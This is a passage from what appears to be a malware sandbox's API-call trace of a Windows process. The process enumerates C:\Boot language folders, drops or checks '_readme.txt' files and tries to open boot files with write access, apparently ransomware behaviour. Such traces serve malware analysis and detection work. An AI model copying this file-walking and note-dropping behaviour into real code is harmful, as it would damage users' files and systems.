0x9c5da58 [0058.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.270] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0058.270] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.270] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.271] PathFindFileNameW (pszPath="") returned="" [0058.271] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.271] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.271] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.271] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.271] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0058.271] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0058.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.271] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.272] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.272] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.272] PathFindExtensionW (pszPath="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned=".mui" [0058.272] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216680 | out: hHeap=0x660000) returned 1 [0058.272] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec76650, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.272] PathFindExtensionW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned=".txt" [0058.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216680 | out: hHeap=0x660000) returned 1 [0058.272] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec76650, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.272] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e950 | out: hHeap=0x660000) returned 1 [0058.272] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.272] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.272] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0058.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.273] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.273] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.273] PathFindFileNameW (pszPath="") returned="" [0058.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.273] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.273] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3268798 [0058.273] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0058.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.273] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.273] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0058.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.273] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0058.274] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec9c7b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec9c7b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.274] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec9c7b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec9c7b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.274] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.274] PathFindExtensionW (pszPath="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned=".mui" [0058.274] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.274] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec9c7b0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec9c7b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec9c7b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.274] PathFindExtensionW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned=".txt" [0058.274] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec9c7b0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec9c7b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec9c7b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.274] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.274] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e950 [0058.274] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 